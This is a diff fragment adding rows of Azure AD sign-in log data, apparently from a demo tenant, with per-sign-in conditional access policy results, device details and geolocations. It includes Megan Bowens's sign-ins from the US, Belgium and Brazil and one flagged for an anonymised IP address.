{'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c58f2de3-9305-4921-96ef-ebf09f2a0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c58f2de3-9305-4921-96ef-ebf09f2a0800,SigninLogs,Sucess,36.6404686,-78.26995087
+1406,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:42.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9e970c65-d020-489d-9283-9d6fad531e36,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",9cf72c2b-aa6a-41ec-adc7-3fa20f540800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,9cf72c2b-aa6a-41ec-adc7-3fa20f540800,SigninLogs,Sucess,34.06555176,-118.2405396
+1407,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7976454-791a-4015-b043-fd06ae65c894,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c6df9c5c-6712-4175-a3db-58ce9f3b0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c6df9c5c-6712-4175-a3db-58ce9f3b0800,SigninLogs,Sucess,36.6404686,-78.26995087
+1408,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:41.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e726f7c3-9a09-40c4-a93a-eae964e4b2a1,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:00,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",bdce1a28-1f37-4b53-9d71-d901c0d82400,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,bdce1a28-1f37-4b53-9d71-d901c0d82400,SigninLogs,Sucess,51.4458313,-0.969720006
+1409,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:12.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a132bb7c-8908-4230-a034-4b936626aa3d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",368167e5-753b-476f-b20c-ef028a580500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,368167e5-753b-476f-b20c-ef028a580500,SigninLogs,Sucess,50.6406517,5.572050095
+1410,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:17.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,97e25473-b2a3-4e28-a400-10e31453b779,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",368167e5-753b-476f-b20c-ef02d4580500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,368167e5-753b-476f-b20c-ef02d4580500,SigninLogs,Sucess,50.6406517,5.572050095
+1411,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:08.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8b62a34a-f7bd-4b4c-aaf3-582e75a049cf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e590880600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,65ce963c-c870-4311-8389-19e590880600,SigninLogs,Sucess,34.06555176,-118.2405396
+1412,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:01.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3c4f3485-2777-4f7d-8f7b-ac3866b7f76e,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,NL,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Exchange Online PowerShell,[],notApplied,08/04/2020 11:10,{'deviceId': ''},3c1797ce-9a4e-4e19-b7f0-81e064450a00,,,"{'countryOrRegion': 'NL', 'geoCoordinates': {'longitude': 4.940189838409424, 'latitude': 52.309051513671875}, 'state': 'Noord-Holland', 'city': 'Amsterdam'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,3c1797ce-9a4e-4e19-b7f0-81e064450a00,SigninLogs,Sucess,52.30905151,4.940189838
+1413,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:42.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,01b1469f-f053-0000-5421-7f2de6a63adb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:23,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d09c2317-414d-4072-ab4f-d2f676020900,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d09c2317-414d-4072-ab4f-d2f676020900,SigninLogs,Sucess,-20.54751015,-47.4056282
